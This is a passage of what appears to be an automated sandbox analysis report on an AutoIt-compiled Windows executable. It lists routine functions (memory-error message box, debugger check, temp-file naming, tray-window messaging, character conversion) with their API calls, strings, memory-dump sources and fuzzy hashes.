                                                                                                                                                                                                                                          • Instruction ID: c740ac13662d416fe00fa1c66d6012b5d101d8bf52b52b5e8494717225cd4ac9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9668d50f532d7f26057f1635cdab80442baf03dbc87ceb82586c05dcd700074
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32E02B023182205092311279FCC29BF5689DFC5751714182FFE95C62E7EBD48D91A3A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00130B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00130B23
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                          • Opcode ID: 8fcba64ead496c18e8d8f765380fedd174d36c8820f762edbbefe6e0d8da373c
                                                                                                                                                                                                                                          • Instruction ID: dd4d26a99be8aa32544452687a566af1b8fbba0214cdd63d674f4271af9163b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fcba64ead496c18e8d8f765380fedd174d36c8820f762edbbefe6e0d8da373c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42E0DF322883492AD31036957C03FE9BA858F09B24F10442AFB88B59C38BE324A056E9
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000F0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000F0D71,?,?,?,000D100A), ref: 000EF7CE
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,000D100A), ref: 000F0D75
                                                                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000D100A), ref: 000F0D84
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000F0D7F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                          • API String ID: 55579361-631824599
                                                                                                                                                                                                                                          • Opcode ID: d3b5a38b4bf4cc32cf9807bb9bfebcc71aff0b4934d36091bb9babb596521761
                                                                                                                                                                                                                                          • Instruction ID: 70e61b863f62a30b47d030e800f3d17d2be738e5690106a37534cf7b30420b19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3b5a38b4bf4cc32cf9807bb9bfebcc71aff0b4934d36091bb9babb596521761
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59E06D742003518BD7609FB8E808366BBE4AF04745F00892DE986C6A52EBB6E4848BA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00143017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0014302F
                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00143044
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                          • String ID: aut
                                                                                                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                          • Opcode ID: 43f68ddc5b1cc1d580da7a0d53dd6d93d4b2ee2fa26c3553f75418bab4914d22
                                                                                                                                                                                                                                          • Instruction ID: 5be8da7b5fd1840ebe3a22d60282a02bbcb4498da612574a27db646e00af3fd7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43f68ddc5b1cc1d580da7a0d53dd6d93d4b2ee2fa26c3553f75418bab4914d22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD05E7250132867DA20A7A4EC0EFDB7A7CDB04750F0002A2BA95E2091DAF49984CAE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0012D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                                                                          • String ID: %.3d$X64
                                                                                                                                                                                                                                          • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                          • Opcode ID: 1e98d3954c983cb02f4adf59bdb7b8533b489bb91bd7d9912bb6df993fe6b188
                                                                                                                                                                                                                                          • Instruction ID: 6612ef09e9333f423a4bfc8108ccf88367d4f378d8b7f2032faa87a879bb41b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e98d3954c983cb02f4adf59bdb7b8533b489bb91bd7d9912bb6df993fe6b188
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED01271808129E9CB5497E0FC459F9B37CFB18341F618452F806A1040D724C568A761
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00162322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0016232C
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0016233F
                                                                                                                                                                                                                                            • Part of subcall function 0013E97B: Sleep.KERNEL32 ref: 0013E9F3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                          • Opcode ID: 8a4bf0beea032578cd4af2f87d02708bed152b0fbef3545bb4378bb5138f1046
                                                                                                                                                                                                                                          • Instruction ID: 1d9c554253f6d3b81a98ce5bbb087733f70ce5d8e40afd42b4b5011d454f0d82
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a4bf0beea032578cd4af2f87d02708bed152b0fbef3545bb4378bb5138f1046
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AD012363D4310B7EA68B770EC0FFD67A549B14B14F004916B786AA1D0CAF0A841CB94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00162356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0016236C
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 00162373
                                                                                                                                                                                                                                            • Part of subcall function 0013E97B: Sleep.KERNEL32 ref: 0013E9F3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                          • Opcode ID: 4cfc69215fda5e9aed9a0ed2bc74eb211aa0656a5a3ea058e5d9c1830919dc31
                                                                                                                                                                                                                                          • Instruction ID: f645909d97405caf2ef9e46520d852cd4a5b0e794cab4fdea6f430edf5b3c3dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cfc69215fda5e9aed9a0ed2bc74eb211aa0656a5a3ea058e5d9c1830919dc31
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15D012323C13107BEA68B770EC0FFD67A549B14B14F004916B786EA1D0CAF0B841CB98
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0010BE93
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0010BEA1
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0010BEFC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                                                                          • Opcode ID: 294c557f1bb9dc5556bce7ac05c456833d4c3e708bc0e03e0bec87295fb1da58
                                                                                                                                                                                                                                          • Instruction ID: a026c153c1ca4d90deb71347a76c8fa582e196afdd7baad3f9eeebe443a94b15
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 294c557f1bb9dc5556bce7ac05c456833d4c3e708bc0e03e0bec87295fb1da58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D041C534609207AFCF258F64CCD4ABA7BA5EF42710F154169FAD9971E1DBB08D01DB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%